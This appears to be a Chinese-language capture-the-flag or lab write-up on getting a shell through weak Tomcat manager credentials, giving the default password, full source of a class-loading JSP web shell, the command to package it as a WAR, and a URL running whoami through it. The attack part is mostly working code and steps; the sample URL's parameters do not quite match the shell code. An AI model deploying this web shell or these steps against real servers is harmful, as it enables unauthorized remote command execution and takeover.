tomcat-pass-getshell 弱口令

一、简介
Tomcat的用户名和密码在其 conf omcat-users.xml 文件中配置， tomcat存在管理后台进行应用部署管理，且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令，攻击者容易进行暴力破解登录后台， 通过弱口令登录后台，部署war包geshell。
二、影响版本
管理后台管理秒存在弱口令
三、漏洞复现
首先登录网站进入后台

Tomacat管理后台默认用户密码为：tomcat

在上传war包之前我们需要自己写一个jsp的一句话木马并打包成war包

<%!
class U extends ClassLoader {
  U(ClassLoader c){
  super(c);
}
public Class g(byte[] b){
  return super.defineClass(b,0,b.length);
}
}
public byte[] base64Decode(String str) throws Exception{
  try{
  Class clazz =Class.forName("sun.misc.BASE64Decoder");
  return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
}catch (Exception e){
  Class clazz =Class.forName("java.util.Base64");
  Object decoder =clazz.getMethod("getDecoder").invoke(null);
  return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
}
}
%>
<% 
String cls =request.getParameter("doxi");
if(cls != null){
  new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
}
%>

在jsp木马的目录下进入命令行界面；jar -cvf 1.war .

将打包好的war包部署到Tomcat管理后台

上传成功后我们会看到我们的部署的网站并进行访问

出现这个说明上传成功
http://123.58.224.8:49305/1/1.jsp?pwd=doxi&cmd=whoami

pwd后是jsp一句话木马里的密码，cmd后是要执行的命令
出现这些说明漏洞复现成功
查看flag